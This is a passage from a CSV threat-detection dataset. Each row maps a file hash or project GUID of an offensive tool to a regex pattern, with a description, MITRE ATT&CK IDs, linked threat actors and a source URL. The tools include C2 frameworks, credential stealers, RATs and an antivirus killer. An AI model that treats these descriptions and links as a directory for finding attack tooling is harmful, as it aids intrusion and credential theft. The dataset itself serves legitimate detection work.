- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33517" "*ae136c5aa1e9a4524f30350fc8fc45993e2a81d0ffab2d7c4bd0f9ae7cea2060*",".{0,1000}ae136c5aa1e9a4524f30350fc8fc45993e2a81d0ffab2d7c4bd0f9ae7cea2060.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","33518" 
"*ae153d08924fd9da1a2419a7cabf75db4eba8996ebd7552d5a4742b7e4d2df45*",".{0,1000}ae153d08924fd9da1a2419a7cabf75db4eba8996ebd7552d5a4742b7e4d2df45.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","33519" "*ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe*",".{0,1000}ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33520" "*ae18dc1b4124abbbd1eaff296cedaa2e8d6ef2ad1070b537f1963355cd1cd769*",".{0,1000}ae18dc1b4124abbbd1eaff296cedaa2e8d6ef2ad1070b537f1963355cd1cd769.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","33521"
"*ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14*",".{0,1000}ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33522" "*ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9*",".{0,1000}ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33523" "*ae219371bbfc41040dc9150b688271b9cd51cb325e4c328f954a6b474dfb019d*",".{0,1000}ae219371bbfc41040dc9150b688271b9cd51cb325e4c328f954a6b474dfb019d.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33524" "*ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74*",".{0,1000}ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","33525" "*ae23c8ef1b6f0106c344867ca48101e1c94834e4e2b667879eb99aef0e4cbcf1*",".{0,1000}ae23c8ef1b6f0106c344867ca48101e1c94834e4e2b667879eb99aef0e4cbcf1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33526" "*ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5*",".{0,1000}ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33527" "*ae2f9496b86befa082d8d2c4b714c1ace7399401356e1d9502b3a498d92f2bbc*",".{0,1000}ae2f9496b86befa082d8d2c4b714c1ace7399401356e1d9502b3a498d92f2bbc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","33528" "*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","33529" 
"*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","33530" "*ae350439aa4332fe5d7ed69a210d1ec0362ea147b9326d49730e18054e7e7c03*",".{0,1000}ae350439aa4332fe5d7ed69a210d1ec0362ea147b9326d49730e18054e7e7c03.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33532" "*ae35923152fc85dc696a1af8f5715091b5ede761fac61fc5e89f84a2f727b21d*",".{0,1000}ae35923152fc85dc696a1af8f5715091b5ede761fac61fc5e89f84a2f727b21d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","33533" "*AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363*",".{0,1000}AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","33534" "*ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699*",".{0,1000}ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33536" "*ae3fe47fea3540fa053326f19d7ac8198d170efea7551438d2e3deae3381f49f*",".{0,1000}ae3fe47fea3540fa053326f19d7ac8198d170efea7551438d2e3deae3381f49f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","33538" 
"*ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12*",".{0,1000}ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33539" "*ae4ef59bce3e71393264a4cedbeb40bcfeb518740048bf4b619fad20f24adb5a*",".{0,1000}ae4ef59bce3e71393264a4cedbeb40bcfeb518740048bf4b619fad20f24adb5a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33546" "*ae6e3c9ec1127ef2957da29ae7394f77c043ff7d1d80b92d02a9f9bb40323ad4*",".{0,1000}ae6e3c9ec1127ef2957da29ae7394f77c043ff7d1d80b92d02a9f9bb40323ad4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33549" 
"*ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722*",".{0,1000}ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33551" "*ae84192b77cec541a088d563dc5f20723123e096*",".{0,1000}ae84192b77cec541a088d563dc5f20723123e096.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","33552" "*AE844C23-294E-4690-8CF3-2E5F9769D8E0*",".{0,1000}AE844C23\-294E\-4690\-8CF3\-2E5F9769D8E0.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","33553" "*ae85963af2849bb420e8b9d1e0d7f2194bf07d9b0d4a85fce7e5c40651626adc*",".{0,1000}ae85963af2849bb420e8b9d1e0d7f2194bf07d9b0d4a85fce7e5c40651626adc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33554" "*ae866775c318b21e13caa37dbfd2b96c03de3ba73522f437c14cc5844270c415*",".{0,1000}ae866775c318b21e13caa37dbfd2b96c03de3ba73522f437c14cc5844270c415.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","33555" "*ae8abf10e555cee9769abea0e2d3379b11bc6a817f75a0b6038d294fa3d6a136*",".{0,1000}ae8abf10e555cee9769abea0e2d3379b11bc6a817f75a0b6038d294fa3d6a136.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post 
exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","33556" "*ae8dc27ab20f07935522d714f2015e0f978ff982ed2e6f1441ca14d2bf286c92*",".{0,1000}ae8dc27ab20f07935522d714f2015e0f978ff982ed2e6f1441ca14d2bf286c92.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33557" "*ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102*",".{0,1000}ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33558" "*ae901f6fbb7b13b31dadf4a360838cf9e795e819e2658ce13ba927734f49da73*",".{0,1000}ae901f6fbb7b13b31dadf4a360838cf9e795e819e2658ce13ba927734f49da73.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33559" "*ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079*",".{0,1000}ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33560" "*ae9c79299cf29b1c11d7d0517e158410e15306405bbf1c981305683454247845*",".{0,1000}ae9c79299cf29b1c11d7d0517e158410e15306405bbf1c981305683454247845.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33561" "*aea165d63fd5898c5c31644fa051f804d35abf92ed3ee340429f22a112ab6ec0*",".{0,1000}aea165d63fd5898c5c31644fa051f804d35abf92ed3ee340429f22a112ab6ec0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33562" "*aeachknmefphepccionboohckonoeemg*",".{0,1000}aeachknmefphepccionboohckonoeemg.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33567" "*aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03*",".{0,1000}aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","33568" "*aebea2e78c57a1d2e961e1d4bf534be7de985c64a36801d292512be7ee70c3c7*",".{0,1000}aebea2e78c57a1d2e961e1d4bf534be7de985c64a36801d292512be7ee70c3c7.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33569" "*AEC0EBBA-3BE4-4B5C-8F5C-0BB8DDDA7148*",".{0,1000}AEC0EBBA\-3BE4\-4B5C\-8F5C\-0BB8DDDA7148.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","33571" "*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#GUIDproject","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","33572" "*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33573" 
"*aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69*",".{0,1000}aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","33574" "*aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52*",".{0,1000}aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33579" "*aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64*",".{0,1000}aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33580" "*aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09*",".{0,1000}aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","33582" "*aeebe34b285a98fe37de5b3128ea9e302b9feef62ca1b5a85fa41208e328433d*",".{0,1000}aeebe34b285a98fe37de5b3128ea9e302b9feef62ca1b5a85fa41208e328433d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33583" "*aeec0f065823849ebb2ded6654d59526ee8b73520117bd033a19e011c9455248*",".{0,1000}aeec0f065823849ebb2ded6654d59526ee8b73520117bd033a19e011c9455248.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
